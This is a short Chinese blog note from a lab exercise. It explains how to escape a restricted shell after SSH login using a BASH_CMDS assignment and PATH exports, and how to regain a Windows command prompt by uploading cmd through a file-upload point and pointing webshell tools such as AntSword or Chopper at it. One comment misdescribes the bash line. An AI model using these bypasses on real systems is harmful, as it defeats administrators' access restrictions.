小记如何绕过受限的shell
今天的靶场登陆ssh后发现shell受限,如下
woami都执行不了,查看对应的bin目录,发现只能执行4个命令
![image image](https://img2018.cnblogs.com/blog/1943028/202003/1943028-20200301211906460-1772754575.png)
在网上学到一招可以绕过这种受限制的被阉割的shell
BASH_CMDS[a]=/bin/sh;a #把/bin/bash给a变量
/bin/bash
echo $0 #查看脚本本身的名字
echo $? #命令执行结果反馈,0代表执行成功,其余数字表示不成功
export PATH=$PATH:/bin/ #将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin #将/usr/bin作为PATH环境变量导出
执行完上面加粗的四步之后就可以执行所有命令了
Windows中如果遇到此类情形
1.找到一处可上传文件的位置上传cmd
![image image](https://img2020.cnblogs.com/blog/1943028/202004/1943028-20200415090235281-486619440.png)
2.蚁剑可以自定义cmd的环境变量
![image image](https://img2020.cnblogs.com/blog/1943028/202004/1943028-20200415090235814-869190990.png)
使用菜刀同样上传cmd文件
设置cmd环境变量 终端输入 set cmd文件的物理地址
原文地址:https://www.cnblogs.com/sup3rman/p/12392161.html